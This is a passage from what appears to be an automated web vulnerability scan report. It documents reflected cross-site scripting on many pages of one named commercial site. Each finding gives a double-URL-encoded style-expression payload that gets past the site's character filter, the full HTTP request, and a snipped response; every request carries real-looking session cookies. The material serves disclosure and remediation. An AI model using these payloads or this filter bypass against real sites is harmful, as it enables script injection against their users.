This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:41 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778542058:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=943
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100187


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Portfolios</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175962&2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1&fromsla=T&2f0f7'style='x:expression(alert(1))'b5a9e77cfd5=1&2f0f7%27style%3d%27x%3aexpression%28alert%281%29%29%27b5a9e77cfd5=1'>
...[SNIP]...

2.184. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Alabama

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:52 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: -109256382:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=981
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110364


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Alabama</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175313&bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1&bd71c%27style%3d%27x%3aexpression%28alert%281%29%29%27b08045fc3e2=1&fromsla=T&bd71c'style='x:expression(alert(1))'b08045fc3e2=1'>
...[SNIP]...

2.185. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Alaska

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:41 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 2001989218:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=948
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76541


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Alaska</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260041&4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1&4d41a'style='x:expression(alert(1))'5bce84a02ce=1&4d41a%27style%3d%27x%3aexpression%28alert%281%29%29%275bce84a02ce=1&fromsla=T'>
...[SNIP]...

2.186. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Arizona

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -2034791080:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=839
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110717


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Arizona</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175347&a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1&a0e30'style='x:expression(alert(1))'d86d71a4401=1&fromsla=T&a0e30%27style%3d%27x%3aexpression%28alert%281%29%29%27d86d71a4401=1'>
...[SNIP]...

2.187. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Arkansas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:47 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -259188253:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110280


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Arkansas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175348&1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1&1396a'style='x:expression(alert(1))'6e71f63c249=1&fromsla=T&1396a%27style%3d%27x%3aexpression%28alert%281%29%29%276e71f63c249=1'>
...[SNIP]...

2.188. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Calgary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:45 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: 2001990455:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=842
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 98472


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Calgary</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260059&7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1&7cdd3'style='x:expression(alert(1))'8d075c1b2de=1&7cdd3%27style%3d%27x%3aexpression%28alert%281%29%29%278d075c1b2de=1&fromsla=T'>
...[SNIP]...

2.189. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/California

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:50 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:45 GMT
NS_RTIMER_COMPOSITE: -1590889426:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=824
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111521


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>California</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175355&e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1&e8313%27style%3d%27x%3aexpression%28alert%281%29%29%2773dad229e98=1&e8313'style='x:expression(alert(1))'73dad229e98=1&fromsla=T'>
...[SNIP]...

2.190. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Colorado

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:55 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:52 GMT
NS_RTIMER_COMPOSITE: 334644940:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=960
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110761


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Colorado</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175356&43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1&43f2c%27style%3d%27x%3aexpression%28alert%281%29%29%2725987bedbdc=1&43f2c'style='x:expression(alert(1))'25987bedbdc=1&fromsla=T'>
...[SNIP]...

2.191. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Connecticut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 1666343690:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=984
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 81996


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Connecticut</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
nsing.com/s.nl?sc=77&category=175359&6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1&6b72d%27style%3d%27x%3aexpression%28alert%281%29%29%27146d7de1dc2=1&fromsla=T&6b72d'style='x:expression(alert(1))'146d7de1dc2=1'>
...[SNIP]...

2.192. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Delaware

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:51:34 GMT
NS_RTIMER_COMPOSITE: 328749590:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54505


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Delaware</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175361&e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1&e8bba%27style%3d%27x%3aexpression%28alert%281%29%29%27f6b9aaa7370=1&fromsla=T&e8bba'style='x:expression(alert(1))'f6b9aaa7370=1'>
...[SNIP]...

2.193. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
